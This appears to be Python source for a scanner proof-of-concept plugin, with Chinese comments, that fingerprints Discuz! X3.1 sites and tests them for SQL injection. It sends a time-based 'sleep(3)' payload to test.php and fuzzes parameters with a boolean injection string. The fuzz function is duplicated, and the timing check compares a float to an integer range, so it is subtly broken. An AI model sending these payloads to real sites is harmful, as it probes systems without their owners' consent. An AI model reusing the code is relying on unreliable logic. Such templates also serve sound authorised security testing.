def fingerprint(self, target): url = target host = util.getHostByUrl(url) code, head, body, location, error = util.sendHttpRequest(host) if code == 200: if re.search("<p>Powered by <strong><a href=\"http://www.discuz.net\">Discuz!</a></strong> <em>X3.1</em></p>", body): # 目标站点为discuz X3.1框架,适用于本poc,可以扫描" return True else: return False
def audit(self, target): urlWithPayload = util.getHostByUrl(target) + '/test.php?act=login&sess_id=1%27%20and%20sleep%283%29--%201' start = time.clock() code, head, body, location, error = util.sendHttpRequest(urlWithPayload) if code == 200: if body.find('<b>Warning</b>: INSERT INTO') != -1 or time.clock() - start in range(1, 3): # 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。 self._addScanResult({"method": "GET", # http请求的类型 GET/POST/HEAD "post_data": "", # 如果请求为POST,则为包含payload的POST数据 "url": urlWithPayload, # 含有payload的url "vul_key": "sess_id"}) # 存在漏洞点的参数 return True return False
def fuzz(self, context): url = context["url"] # 需要fuzz的url,假设为http://www.test.com/index.php?a=aaa&b=bbb&c=ccc param = context["param"] # 需要fuzz的param,假设为b payload = "1'+and+'1'%3d'1" urlWithPayload = util.fillPayload(url, param, payload, isAppend=True) # 装填payload到url的指定参数上,isAppend为True,则payload追加在原有参数值后,否则直接覆盖掉原有参数值 # 装填结果为 http://www.test.com/index.php?a=aaa&b=bbb1'+and+'1'%3d'1&c=ccc code, head, body, location, error = util.sendHttpRequest(urlWithPayload) if code == 200: if re.search("\w?SQL Error\w?", body): # 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。 self._addScanResult({"method": context["method"], "post_data": context["post_data"], "url": urlWithPayload, # 含有payload的url "vul_key": context["param"]}) # 存在漏洞点的参数 return True return False
def fuzz(self, context): url = context[ "url"] # 需要fuzz的url,假设为http://www.test.com/index.php?a=aaa&b=bbb&c=ccc param = context["param"] # 需要fuzz的param,假设为b payload = "1'+and+'1'%3d'1" urlWithPayload = util.fillPayload(url, param, payload, isAppend=True) # 装填payload到url的指定参数上,isAppend为True,则payload追加在原有参数值后,否则直接覆盖掉原有参数值 # 装填结果为 http://www.test.com/index.php?a=aaa&b=bbb1'+and+'1'%3d'1&c=ccc code, head, body, location, error = util.sendHttpRequest( urlWithPayload) if code == 200: if re.search("\w?SQL Error\w?", body): # 发现漏洞,通过调用基类的_addScanResult()方法来保存结果。可多次调用_addScanResult()来保存多个漏洞结果。 self._addScanResult({ "method": context["method"], "post_data": context["post_data"], "url": urlWithPayload, # 含有payload的url "vul_key": context["param"] }) # 存在漏洞点的参数 return True return False